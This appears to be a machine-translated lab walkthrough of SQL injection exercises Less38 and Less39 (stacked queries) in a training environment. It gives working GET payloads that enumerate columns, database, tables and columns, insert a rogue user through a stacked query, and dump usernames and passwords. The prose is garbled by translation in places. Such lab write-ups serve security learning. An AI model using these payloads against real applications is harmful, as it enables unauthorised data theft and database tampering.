Catalog

One 、 recommend ：

Two 、（ manual ）SQL Basic steps of injection ：

3、 ... and 、Less38（GET-Stacked Query Injection - String）

3.1、 brief introduction ：（ Stack Injection - Error echo - Character injection ）

3.2、 First step ： Injection point test

 3.3、 The second step ： Analysis and filtering

3.4、 The third step ： Determine the number of fields / Echo position

3.5、 Step four ： Warehouse

3.6、 Step five ： Name of Pop Watch

3.7、 Step six ： Pop field

 3.8、 Step seven ： Stack Injection accounts

3.9、 Step eight ： Burst data

Four 、Less39（GET-Stacked Query Injection - Intiger based）

4.1、 brief introduction ：（ Stack Injection - Error echo - Digital injection ）

4.2、 utilize ：

One 、 recommend ：

【SQL Inject 】 Stack Injection https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501【SQL Inject 】 Digital injection & Character injection https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185^v2^control&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450

Two 、（ manual ）SQL Basic steps of injection ：

First step ： Injection point test

The second step ： Analyze permissions

The third step ： Determine the number of fields

Step four ： Burst database name

Step five ： Name of Pop Watch

Step six ： Pop field name

Step seven ： Stack Injection accounts

Step eight ： Inquire about

3、 ... and 、Less38（GET-Stacked Query Injection - String）

3.1、 brief introduction ：（ Stack Injection - Error echo - Character injection ）

Request method ：GET

Method ： Stack Injection + closed （ Character injection ）+ Error echo

3.2、 First step ： Injection point test

Input ?id=1 

An error is reported when a single quotation mark is added

 ?id=1'--+

Echo normal , The description is closed in single quotation marks

The character type is

 3.3、 The second step ： Analysis and filtering

Method 1 ：

Consider replacing the injected statement characters one by one step , Until there is no error （ A waste of time ）

Or replace them all （ If you make a mistake , I don't know where it is filtered ）

---

Method 2 ：

Get the source code for white box audit （ The optimal ）

3.4、 The third step ： Determine the number of fields / Echo position

?id=1' union select 1,2,3 --+

Echo normal

 

?id=1' union select 1,2,3,4 --+

Report errors

  The number of description fields is 3

---

Determine the echo position

?id=-1' union select 1,2,3 --+

 

3.5、 Step four ： Warehouse

?id=-1' union select 1,2,database() --+

3.6、 Step five ： Name of Pop Watch

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

 

3.7、 Step six ： Pop field

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

 

 3.8、 Step seven ： Stack Injection accounts

?id=1';insert into users(id,username,password) values ('38','less38','at38')--+

3.9、 Step eight ： Burst data

?id=-1' union select 1,2,group_concat(username,password) from security.users--+

We can see the data we injected

Four 、Less39（GET-Stacked Query Injection - Intiger based）

4.1、 brief introduction ：（ Stack Injection - Error echo - Digital injection ）

Request method ：GET

Method ： Stack Injection + closed （ Digital injection ）+ Error echo + The joint query

4.2、 utilize ：

And Less38 equally

Is to change from character type to number type

That is, there is no need to close